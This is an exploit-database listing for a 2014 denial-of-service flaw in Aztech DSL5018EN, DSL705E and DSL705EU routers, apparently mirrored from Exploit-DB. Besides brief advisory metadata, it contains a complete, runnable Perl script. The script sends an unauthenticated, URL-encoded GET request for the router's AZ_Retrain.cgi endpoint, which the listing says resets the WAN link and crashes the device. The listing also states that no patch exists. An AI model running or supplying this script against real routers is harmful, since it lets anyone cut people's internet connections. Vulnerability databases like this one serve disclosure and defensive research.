Aztech Modem Denial of Service Attack

vendor:

Routers

by:

SecurityFocus

7,5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Routers

Affected Version From: Aztech DSL5018EN, DSL705E and DSL705EU

Affected Version To: Aztech DSL5018EN, DSL705E and DSL705EU

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Aztech Modem Denial of Service Attack

Multiple Aztech routers are prone to a denial-of-service vulnerability. Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition. Aztech DSL5018EN, DSL705E and DSL705EU are vulnerable.

Mitigation:

N/A

Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/69809/info

Multiple Aztech routers are prone to a denial-of-service vulnerability.

Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition.

Aztech DSL5018EN, DSL705E and DSL705EU are vulnerable. 
*/

#!/usr/bin/perl
use strict;
use IO::Socket;

if(!defined($ARGV[0])) {
system ('clear');
print "---------------------------------------------\n";
print "++ Aztech Modem Denial of Service Attack\n";
print "++ Usage: perl $0 TARGET:PORT\n";
print "++ Ex: perl $0 192.168.254.254:80\n\n";
exit;
}

my $TARGET = $ARGV[0];
my ($HOST, $PORT)= split(':',$TARGET);
my $PATH = "%2f%63%67%69%2d%62%69%6e%2f%41%5a%5f%52%65%74%72%61%69%6e%2e%63%67%69";

system ('clear');
print "---------------------------------------------\n";
print "++ Resetting WAN modem $TARGET\n";

my $POST = "GET $PATH HTTP/1.1";
my $ACCEPT = "Accept: text/html";

my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;

print $sock "$POST\n";
print $sock "$ACCEPT\n\n";
print "++ Sent. The modem should be disconnected by now.\n";
$sock->close();

exit;